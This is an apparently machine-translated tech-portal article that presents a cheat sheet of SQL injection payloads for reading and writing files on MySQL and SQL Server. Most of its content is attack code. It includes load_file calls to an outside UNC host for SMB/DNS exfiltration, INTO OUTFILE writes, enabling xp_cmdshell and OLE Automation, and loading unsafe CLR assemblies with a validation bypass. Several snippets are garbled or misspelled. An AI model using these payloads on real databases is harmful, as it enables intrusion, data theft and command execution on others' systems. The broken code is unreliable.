Shulou(Shulou.com)05/31 Report--

This article mainly introduces the SQL injection in the file reading and writing methods have what, with a certain reference value, interested friends can refer to, I hope you read this article after a lot of gains, the following let Xiaobian take you to understand.

I. MySQL

read file

Common read files, you can use hexadecimal instead of string

select load_file ('c:/boot.ini') select load_file(0x633 a2f626f6f742e696e69)select load_file ('//ecma.io/1.txt ') # smb protocol select load_file ('\\\ecma.io\\1.txt') #Available for DNS tunneling

write file

I know two ways to write documents.

select 0x313233 into outfile 'D:/1.txt'select 0x313233 into dumpfile 'D:/1.txt'

SQL Server

read file

1. BULK INSERT

create table result(res varchar(8000));bulk insert result from 'd:/1.txt';

2. CLR integration

//Open CLR set to exec sp_configure 'show advanced options', 1;reconfigure;exec sp_configure 'clr enabled', 1reconfigure create assembly sqb from 'd:\1.exe' with permission_set=unsafe

The above sentence can be used to load any. NET binary file from a remote server into the database using the create assembly function; however, it will verify whether it is a legitimate. NET program, resulting in failure.

select master.dbo.fn_varbintohexstr(cast(content as varbinary)) from sys.assembly_files

Bypass, first load a valid. NET binary file, and then append the file, the following is the bypass method.

create assembly sqb from 'd:\net.exe';alter assembly sqb add file from 'd:\1.txt'alter assembly sqb add file from 'd:\notnet.exe'

3. Script.FileSystemObject

#Open Ole Automation Procedures sp_configure 'show advanced options', 1;RECONFIGURE;sp_configure 'Ole Automation Procedures', 1;RECONFIGURE;declare @o int, @f int, @t int, @ret intdeclare @line varchar(8000)exec sp_oacreate 'scripting.filesystemobject',@o outexec sp_oamethod @o, 'opentextfile', @f out, 'd: \1.txt', 1exec @ret = sp_onmethod @f, 'readline', @line outwhile(@ret = 0) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end

write file

1. Script.FileSystemObject

declare @o int, @f int, @t int, @ret intdeclare @line varchar(8000)exec sp_oacreate 'scripting.filesystemobject',@o outexec sp_oamethod @o, 'createtextfile', @f out, 'e:\1.txt', 1exec @ret = sp_oamethod @f, 'writeline', NULL ,'This is the test string'

2. BCP copy file (test failed, no bcp.exe)

c:\windows>system32>bcp "select name from sysobjects" query testout.txt -c -s 127.0.0.1 -U sa -p"sa"

3. xp_cmdshell

exec xp_cmdshell 'echo test>d:\1.txt'

Third, Oracle

Pass, Oracle is too bad ~~~ Almost all are limited by PL/SQL, so I won't discuss it for the time being.

Thank you for reading this article carefully. I hope Xiaobian will share the article "What are the methods of reading and writing files in SQL injection?" This article is helpful to everyone. At the same time, I hope you will support it a lot. Pay attention to the industry information channel. More relevant knowledge is waiting for you to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.